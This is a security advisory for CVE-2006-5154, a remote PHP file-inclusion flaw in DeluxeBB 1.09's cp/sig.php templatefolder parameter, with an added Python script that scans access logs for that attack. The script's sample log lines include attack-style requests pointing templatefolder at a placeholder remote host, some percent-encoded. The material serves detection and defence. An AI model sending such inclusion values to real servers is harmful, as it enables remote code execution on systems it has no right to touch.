PT-2006-5892 · Deluxebb · Deluxebb

Published: 2006-10-03 · Updated: 2024-02-14 · CVE-2006-5154

CVSS v2.0: 7.5 (High)

Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Name of the Vulnerable Software and Affected Versions: DeluxeBB versions 1.09 and earlier

Description: The issue allows remote attackers to execute arbitrary PHP code by supplying a URL in the templatefolder parameter.

Recommendations: For DeluxeBB versions 1.09 and earlier, consider disabling the cp/sig.php script until a patch is available, or apply any available security patches. Do not pass untrusted input to the templatefolder parameter, to minimize the risk of code execution.
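
A log check for the condition described above, added here as an example and not part of the advisory or of DeluxeBB: it flags requests whose templatefolder query value decodes to a URL rather than a local folder name. The combined access-log format, the function names and the sample lines (documentation IP ranges, a placeholder host) are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote

# Constructed sample lines in combined log format; IPs, host and paths are placeholders.
SAMPLE_LOG = [
    '192.0.2.10 - - [03/Oct/2006:10:00:01 +0000] "GET /cp/sig.php?templatefolder=templates/default HTTP/1.1" 200 512',
    '198.51.100.7 - - [03/Oct/2006:10:00:05 +0000] "GET /cp/sig.php?templatefolder=http://host.example.invalid/t HTTP/1.1" 200 87',
    '198.51.100.7 - - [03/Oct/2006:10:00:09 +0000] "GET /cp/sig.php?templatefolder=%252F%252Fhost.example.invalid%252Ft HTTP/1.1" 200 87',
    '203.0.113.4 - - [03/Oct/2006:10:01:00 +0000] "GET /index.php HTTP/1.1" 200 1024',
]

# Request line inside the quoted field of an access-log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A value that starts with "scheme:" or "//" is a URL or stream wrapper,
# not a folder name relative to the application.
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]*:|//)', re.IGNORECASE)


def templatefolder_values(target):
    """Yield fully decoded templatefolder values from a request target."""
    query = target.partition("?")[2]
    for value in parse_qs(query, keep_blank_values=True).get("templatefolder", []):
        for _ in range(2):  # undo extra layers of percent-encoding
            value = unquote(value)
        yield value


def find_suspicious(lines):
    """Return (line number, client address, decoded value) for each flagged request."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        for value in templatefolder_values(match.group(1)):
            if REMOTE_RE.match(value):
                hits.append((number, line.split()[0], value))
    return hits


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_LOG):
        print(hit)
```

Only query-string values are visible in an access log; a templatefolder value sent in a POST body needs request-body logging or a WAF rule to be seen.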

Related Identifiers: CVE-2006-5154

Affected Products: Deluxebb